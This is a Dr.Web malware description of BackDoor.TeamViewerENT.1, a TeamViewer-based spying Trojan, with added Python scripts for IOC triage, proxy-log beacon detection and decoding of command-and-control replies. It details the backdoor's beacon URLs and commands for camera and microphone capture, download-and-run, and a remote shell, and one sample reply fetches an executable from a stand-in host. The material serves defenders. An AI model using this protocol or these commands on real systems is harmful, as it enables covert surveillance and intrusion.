
BackDoor.TeamViewerENT.1

Added to the Dr.Web virus database: 2016-08-15

Virus description added:

SHA1:

  • 001c13d05841d2a82229a35fe58235743f1564fe (dropper)
  • 0660cadef21d2061e776e4bcaa6aa4fb48a778be (avicap32.dll)

A backdoor Trojan for Microsoft Windows that is distributed under the name Spy-Agent. It uses components of the TeamViewer remote control utility to spy on users. The Trojan carries three encrypted blocks of executable code, which are decrypted one after another: the first block is encrypted with BASE64 and XOR, the other two with BASE64 and RC4.

The Trojan’s payload is placed in the avicap32.dll library. Once launched, the Trojan disables error messages for the TeamViewer process. When the configuration is read, it is encrypted with a local key and saved back to its previous location. The Trojan hooks function calls in the TeamViewer address space and sets the “system”, “hidden” and “read-only” attributes on every file in its folder.

The Trojan keeps a list of TeamViewer file checksums and regularly verifies them with the MapFileAndCheckSumA API function. If files or components needed for the normal operation of TeamViewer are missing, the Trojan downloads them from its command and control (C&C) server. To ensure that it starts automatically, the Trojan modifies particular branches of the Windows system registry, under HKCU or HKLM depending on whether or not it has administrative privileges.

The Trojan also removes the tvicap32.dll file. It then launches a separate thread that kills the TeamViewer processes if it detects that TASKMGR.EXE or PROCEXP.EXE is running.
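
As an added example that is not part of the Dr.Web advisory: the host-side indicators described above (the two SHA1 values at the top of the entry, the avicap32.dll / tvicap32.dll file names, and the system+hidden+read-only attribute combination set on every file in the Trojan's folder) can be checked with a small triage script. The attribute check relies on st_file_attributes, which Python only exposes on Windows, so on other platforms it simply reports nothing. The demo folder the script builds and the extra hash of an empty file (DEMO_SHA1) are constructed so the hash path can be exercised offline.

```python
# Added example (not code from the Dr.Web advisory): triage one folder for the
# host indicators the advisory describes. SHA1 values and file names come from
# the advisory; the demo folder is constructed for this demonstration.
import hashlib
import tempfile
from pathlib import Path

# SHA1 indicators listed in the advisory
IOC_SHA1 = {
    "001c13d05841d2a82229a35fe58235743f1564fe": "dropper",
    "0660cadef21d2061e776e4bcaa6aa4fb48a778be": "avicap32.dll (payload)",
}
# File names the advisory associates with the Trojan (tvicap32.dll is the name
# the "oftvdel" command renames avicap32.dll to)
IOC_NAMES = {"avicap32.dll", "tvicap32.dll"}

# Windows FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM;
# the advisory says the Trojan sets all three on every file in its folder
SUSPECT_ATTRS = 0x1 | 0x2 | 0x4


def sha1_of(path):
    """SHA1 hex digest of a file, read in chunks."""
    h = hashlib.sha1()
    with Path(path).open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def has_system_hidden_readonly(path):
    """True if all three attribute bits are set. st_file_attributes exists only
    on Windows, so this is always False elsewhere."""
    attrs = getattr(Path(path).stat(), "st_file_attributes", None)
    return attrs is not None and attrs & SUSPECT_ATTRS == SUSPECT_ATTRS


def triage_folder(folder, ioc_sha1=None, ioc_names=IOC_NAMES):
    """Return (file name, reason) pairs for every indicator hit in one folder."""
    ioc_sha1 = IOC_SHA1 if ioc_sha1 is None else ioc_sha1
    findings = []
    for path in sorted(Path(folder).iterdir()):
        if not path.is_file():
            continue
        if path.name.lower() in ioc_names:
            findings.append((path.name, "file name listed in the advisory"))
        digest = sha1_of(path)
        if digest in ioc_sha1:
            findings.append((path.name, f"SHA1 {digest} matches {ioc_sha1[digest]}"))
        if has_system_hidden_readonly(path):
            findings.append((path.name, "system+hidden+read-only attributes set"))
    return findings


# Constructed demo data: the real indicators plus the SHA1 of an empty file, so
# that the hash comparison can be demonstrated without the actual samples.
DEMO_SHA1 = {**IOC_SHA1,
             "da39a3ee5e6b4b0d3255bfef95601890afd80709": "constructed empty file (demo only)"}


def build_demo_folder():
    """Create a throwaway folder: a suspiciously named file, an empty file, a benign file."""
    folder = Path(tempfile.mkdtemp(prefix="tv_triage_"))
    (folder / "avicap32.dll").write_bytes(b"constructed, not the real payload")
    (folder / "empty.bin").write_bytes(b"")
    (folder / "TeamViewer.exe").write_bytes(b"constructed benign file")
    return folder


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:           # real folder, real indicators only
        hits = triage_folder(sys.argv[1])
    else:                           # no argument: run against the constructed demo
        hits = triage_folder(build_demo_folder(), ioc_sha1=DEMO_SHA1)
    for name, reason in hits:
        print(f"{name}: {reason}")
```

Run it with the TeamViewer installation folder as the only argument; without an argument it builds and scans the constructed demo folder. A name hit alone is not proof of infection (avicap32.dll is a legitimate Windows library name), so the hash and attribute findings are the ones to escalate on.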

The backdoor uses additional plug-ins, which have the .pg extension and are stored in the same folder as the Trojan. To launch them, the backdoor searches its own folder for .pg files. If it finds files with this extension, it launches several threads (their number depends on the number of files found), which decrypt the files with RC4 and load them into memory.

To report its status, the Trojan determines the cursor location and, after an interval specified in the configuration, sends the following request to the command and control server:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&sidl=<cur_time>

where the address is taken from the configuration, <TV_ID> is the TeamViewer ID, <botId> is the unique ID of the infected computer, and <cur_time> is the current time in the “YYYY-MM-DD hh:mm:ss” format.

Further requests are sent only if the cursor location changes or one of the following keys is pressed: VK_RETURN, VK_SPACE, VK_SHIFT. The Trojan then sends the following request:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&eidl=<cur_time>?cidl=<uptime>

where the address is taken from the configuration, <TV_ID> is the TeamViewer ID, <botId> is the unique ID of the infected computer, <cur_time> is the current time in the “YYYY-MM-DD hh:mm:ss” format, and <uptime> is the time the Trojan has spent in idle mode, in seconds (since the last request was sent to the server).

To get instructions from the server, the Trojan waits a particular number of seconds and then sends the following request:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&cidl=<uptime>

where the address is taken from the configuration, <TV_ID> is the TeamViewer ID, <botId> is the unique ID of the infected computer, and <uptime> is the time the Trojan has spent in idle mode, in seconds (since the last request was sent to the server).

The Trojan checks the server’s reply for the “!” character, which marks the beginning of a command. It then splits the reply into arrays of lines using ‘;’ and ‘\r’ as separators; the first line of each array is a command.

Once the commands have been executed, the following request is sent to the server:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&cmd=&device=2
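
The four request shapes above share one path (gate.php) and two fixed parameters (id, stat), and differ only in the parameter that names the beacon type (sidl, eidl, cidl, cmd), which makes them easy to pick out of an HTTP proxy log. As an added example that is not part of the Dr.Web advisory, the script below classifies each logged URL by that parameter and lists the clients that sent one. The log lines and the 203.0.113.27 address (a documentation address standing in for the masked 188.***.***.27) are constructed. The parameter scan works on the raw query string rather than a strict query-string parser, so the malformed second ‘?’ in the eidl request is treated as a separator instead of being swallowed into the eidl value.

```python
# Added example (not code from the Dr.Web advisory): flag gate.php beacons of
# the shapes the advisory lists in a proxy log. Log lines and the
# 203.0.113.27 address are constructed; the path "/windiws/update/gate.php"
# and parameter names are the ones the advisory shows.
import re
from urllib.parse import urlsplit

# Parameter that identifies each beacon type. Order matters: the activity
# report carries both eidl and cidl, so cidl alone must be tested last.
BEACON_KINDS = {
    "sidl": "status report (cursor position)",
    "eidl": "activity report (cursor moved or key pressed)",
    "cmd": "command result",
    "cidl": "instruction poll",
}
REQUIRED = {"id", "stat"}

# Parameter names at the start of the query or after '&'; '?' is accepted as a
# separator too because of the "...&eidl=<t>?cidl=<n>" form in the advisory.
PARAM_RE = re.compile(r"(?:^|[&?])([A-Za-z_]+)=")


def classify_url(url):
    """Return a beacon description for a gate.php URL, or None if it does not match."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/gate.php"):
        return None
    params = set(PARAM_RE.findall(parts.query))
    if not REQUIRED <= params:
        return None
    for key, kind in BEACON_KINDS.items():
        if key in params:
            return kind
    return None


# Constructed proxy log, one request per line: "<time> <client> <method> <url> <status>"
SAMPLE_LOG = """\
2016-08-15T10:00:01Z 10.0.0.5 GET http://203.0.113.27/windiws/update/gate.php?id=123456789&stat=A1B2&sidl=2016-08-15%2010:00:01 200
2016-08-15T10:00:02Z 10.0.0.6 GET http://www.example.com/index.html 200
2016-08-15T10:05:10Z 10.0.0.5 GET http://203.0.113.27/windiws/update/gate.php?id=123456789&stat=A1B2&eidl=2016-08-15%2010:05:10?cidl=309 200
2016-08-15T10:06:00Z 10.0.0.5 GET http://203.0.113.27/windiws/update/gate.php?id=123456789&stat=A1B2&cidl=50 200
2016-08-15T10:06:30Z 10.0.0.5 GET http://203.0.113.27/windiws/update/gate.php?id=123456789&stat=A1B2&cmd=&device=2 200
2016-08-15T10:07:00Z 10.0.0.7 GET http://intranet.example/api/gate.php?token=x 200
"""


def scan_log(text):
    """Return (client, url, kind) for every line whose URL looks like a beacon."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[1], fields[3]
        kind = classify_url(url)
        if kind:
            hits.append((client, url, kind))
    return hits


if __name__ == "__main__":
    for client, url, kind in scan_log(SAMPLE_LOG):
        print(f"{client}  {kind}\n    {url}")
```

The last sample line shows why the fixed parameters matter: an internal application that also happens to serve a gate.php is not flagged because it lacks id and stat. In a real deployment the host part would additionally be compared against the C&C address recovered from the configuration, which the advisory masks.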

The Trojan can execute the following commands:

Command        Description
shutdown       Restart the computer
poweroff       Turn off the computer
delproc        Remove TeamViewer
restart        Relaunch TeamViewer
startaudio     Start listening through the microphone
stopaudio      Stop listening through the microphone
startvideo     Start viewing via the web camera
stopvideo      Stop viewing via the web camera
lexec          Download a file, save it to a temporary folder (%TEMP%) and run it
updef          Update the configuration file and the backdoor’s executable file
vid            Identify the web camera
cmd            Connect to the specified address, run cmd.exe and redirect its input/output to a remote server
delpg          Remove a plug-in from disk
uppg           Download/update a plug-in
upcfgpg        Replace the configuration file with the one specified in the command
oftvdel        Rename avicap32.dll to tvicap32.dll
noexit         Set the parameter value to 1
cfgaudio       Set the value of the corresponding configuration parameter
cfgvideo       Set the value of the corresponding configuration parameter
cfgnomedia     Set the value of the corresponding configuration parameter
cfghostfile    Set the value of the corresponding configuration parameter
cfgwin7kill    Set the value of the corresponding configuration parameter
cfgxpkill      Set the value of the corresponding configuration parameter
cfgpgkey       Set the value of the corresponding configuration parameter
fakedel        Set the value of the corresponding configuration parameter
cfgpassteam    Set the value of the corresponding configuration parameter
cfg            Set the value of the corresponding configuration parameter
cfgnoexit      Set the value of the corresponding configuration parameter
Cfggenid       Set the value of the corresponding configuration parameter
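
As an added example that is not part of the Dr.Web advisory: the reply format described earlier (a “!” marker, then arrays separated by ‘;’ and ‘\r’ whose first element is the command) together with the command table above is enough to decode a captured gate.php reply during an investigation and rate what the server asked the bot to do. The advisory names the two separators but not which one delimits records, so the script assumes ‘\r’ ends one command record and ‘;’ separates the fields inside it. The sample reply, including the download URL in it, is constructed.

```python
# Added example (not code from the Dr.Web advisory): decode a captured gate.php
# reply into (command, args) records and rate each against the advisory's
# command table. Assumption: '\r' ends a record, ';' separates its fields.

# Commands from the advisory's table, lower-cased for comparison
KNOWN_COMMANDS = {
    "shutdown", "poweroff", "delproc", "restart", "startaudio", "stopaudio",
    "startvideo", "stopvideo", "lexec", "updef", "vid", "cmd", "delpg", "uppg",
    "upcfgpg", "oftvdel", "noexit", "cfgaudio", "cfgvideo", "cfgnomedia",
    "cfghostfile", "cfgwin7kill", "cfgxpkill", "cfgpgkey", "fakedel",
    "cfgpassteam", "cfg", "cfgnoexit", "cfggenid",
}
# Commands that fetch or run code, or switch on the microphone or camera
HIGH_IMPACT = {"lexec", "cmd", "uppg", "updef", "upcfgpg", "startaudio", "startvideo"}


def parse_reply(body):
    """Return [(command, [args]), ...]; [] when the '!' start marker is absent."""
    start = body.find("!")
    if start < 0:
        return []
    records = []
    for record in body[start + 1:].split("\r"):
        record = record.strip("\n")          # tolerate "\r\n" line endings
        if not record:
            continue
        fields = record.split(";")
        while fields and fields[-1] == "":   # "cmd;" leaves a trailing empty field
            fields.pop()
        if not fields:
            continue
        records.append((fields[0].strip().lower(), fields[1:]))
    return records


def rate(command):
    """Severity label for one command name."""
    if command in HIGH_IMPACT:
        return "high"
    if command in KNOWN_COMMANDS:
        return "known"
    return "unknown"          # not in the advisory: possibly a newer variant


def triage_reply(body):
    """Return (command, args, severity) for each record in a reply."""
    return [(cmd, args, rate(cmd)) for cmd, args in parse_reply(body)]


# Constructed reply: four records, the last one not in the advisory's table
SAMPLE_REPLY = (
    "!startaudio;\r"
    "lexec;http://203.0.113.27/windiws/update/x.exe;\r"
    "cfgnoexit;1\r"
    "bogus;\r"
)

if __name__ == "__main__":
    for cmd, args, severity in triage_reply(SAMPLE_REPLY):
        print(f"[{severity:7}] {cmd} {args}")
```

Unknown commands are worth keeping rather than discarding: a server that issues names outside the table is the first sign that the sample differs from the one described here.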

Treatment recommendations

  1. If the operating system can be booted (in normal or safe mode), download Dr.Web Security Space and run a full scan of your computer and of all removable media you use. Learn more about Dr.Web Security Space.
  2. If the operating system cannot be booted, change your computer's BIOS settings so that it boots from CD/DVD or from a USB drive. Download the Dr.Web® LiveDisk system recovery disk image or the utility for writing Dr.Web® LiveDisk to a USB drive, then prepare the corresponding USB drive. Boot the computer from this drive, run a full scan and cure the detected threats.

Run a full system scan with Dr.Web Antivirus for Mac OS.

Run a full scan of all disk partitions with Dr.Web Antivirus for Linux.

  1. If your mobile device is working normally, download and install Dr.Web for Android on it. Run a full scan and follow the recommendations for neutralising the detected threats.
  2. If the mobile device is locked by a Trojan of the Android.Locker family (a message about a serious violation of the law or a ransom demand is displayed on the device's screen), proceed as follows:
    • start your smartphone or tablet in safe mode (if you do not know how, consult the mobile device's documentation or contact the manufacturer);
    • then download and install Dr.Web for Android on the mobile device, run a full scan and follow the recommendations for neutralising the detected threats;
    • unplug your device and plug it back in.

Learn more about Dr.Web for Android